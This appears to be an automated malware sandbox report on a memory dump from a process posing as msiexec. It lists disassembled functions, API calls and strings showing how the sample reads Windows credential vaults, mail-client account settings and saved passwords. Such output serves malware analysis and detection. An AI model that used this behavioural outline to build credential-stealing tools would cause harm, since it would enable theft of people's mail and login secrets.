                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpymemset$strlen$_mbscpy
                                                                      • String ID: salu
                                                                      • API String ID: 3691931180-4177317985
                                                                      • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                      • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                      • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                      • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                      • API String ID: 2449869053-232097475
                                                                      • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                      • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                      • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                      • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                      APIs
                                                                      • sprintf.MSVCRT ref: 0040957B
                                                                      • LoadMenuA.USER32(?,?), ref: 00409589
                                                                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                      • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                      • sprintf.MSVCRT ref: 004095EB
                                                                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                      • memset.MSVCRT ref: 0040961C
                                                                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                      • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                      • String ID: caption$dialog_%d$menu_%d
                                                                      • API String ID: 3259144588-3822380221
                                                                      • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                      • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                      • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                      • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                      APIs
                                                                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                      • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                      • API String ID: 2449869053-4258758744
                                                                      • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                      • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                      • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                      • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                      APIs
                                                                      • wcsstr.MSVCRT ref: 0040426A
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                      • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                      • strchr.MSVCRT ref: 004042F6
                                                                      • strlen.MSVCRT ref: 0040430A
                                                                      • sprintf.MSVCRT ref: 0040432B
                                                                      • strchr.MSVCRT ref: 0040433C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                      • String ID: %s@gmail.com$www.google.com
                                                                      • API String ID: 3866421160-4070641962
                                                                      • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                      • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                      • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                      • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                      • API String ID: 2360744853-2229823034
                                                                      • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                      • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                      • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                      • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                      APIs
                                                                      • strchr.MSVCRT ref: 004100E4
                                                                      • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                      • _mbscat.MSVCRT ref: 0041014D
                                                                      • memset.MSVCRT ref: 00410129
                                                                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                        • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                      • memset.MSVCRT ref: 00410171
                                                                      • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                      • _mbscat.MSVCRT ref: 00410197
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                      • String ID: \systemroot
                                                                      • API String ID: 912701516-1821301763
                                                                      • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                      • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                      • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                      • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                      APIs
                                                                        • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                      • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                      • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$strlen
                                                                      • String ID: -journal$-wal$immutable$nolock
                                                                      • API String ID: 2619041689-3408036318
                                                                      • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                      • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                      • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                      • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                      APIs
                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                      • wcslen.MSVCRT ref: 0040874A
                                                                      • wcsncmp.MSVCRT ref: 00408794
                                                                      • memset.MSVCRT ref: 0040882A
                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                      • wcschr.MSVCRT ref: 0040889F
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                      • String ID: J$Microsoft_WinInet
                                                                      • API String ID: 3318079752-260894208
                                                                      • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                      • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                      • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                      • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                      APIs
                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                      • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                      • API String ID: 888011440-2039793938
                                                                      • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                      • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                      • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                      • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                      APIs
                                                                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                      • strchr.MSVCRT ref: 0040327B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileStringstrchr
                                                                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                      • API String ID: 1348940319-1729847305
                                                                      • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                      • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                      • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                      • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                      APIs
                                                                      • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                      • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                      • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                      • API String ID: 3510742995-3273207271
                                                                      • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                      • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                      • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                      • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040F567
                                                                      • memset.MSVCRT ref: 0040F57F
                                                                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                      • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                      • String ID:
                                                                      • API String ID: 78143705-3916222277
                                                                      • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                      • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                      • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                      • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                      APIs
                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                        • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                        • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                      • strchr.MSVCRT ref: 0040371F
                                                                      • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                      • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                      • strlen.MSVCRT ref: 00403778
                                                                      • sprintf.MSVCRT ref: 0040379C
                                                                      • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                      • String ID: %s@gmail.com
                                                                      • API String ID: 3261640601-4097000612
                                                                      • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                      • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                      • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                      • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                      APIs
                                                                      • memset.MSVCRT ref: 004094C8
                                                                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                      • memset.MSVCRT ref: 0040950C
                                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                      • _strcmpi.MSVCRT ref: 00409531
                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                      • String ID: sysdatetimepick32
                                                                      • API String ID: 3411445237-4169760276
                                                                      • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                      • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                      • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                      • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00403504
                                                                      • memset.MSVCRT ref: 0040351A
                                                                      • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                      • _mbscat.MSVCRT ref: 0040356D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _mbscatmemset$_mbscpystrlen
                                                                      • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                      • API String ID: 632640181-966475738
                                                                      • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                      • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                      • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                      • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                      APIs
                                                                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                      • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                      • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                      • String ID:
                                                                      • API String ID: 3642520215-0
                                                                      • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                      • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                      • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                      • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                      • GetDC.USER32(00000000), ref: 004072FB
                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                      • String ID:
                                                                      • API String ID: 1999381814-0
                                                                      • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                      • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                      • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                      • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpymemset
                                                                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                      • API String ID: 1297977491-3883738016
                                                                      • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                      • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                      • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                      • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                      APIs
                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
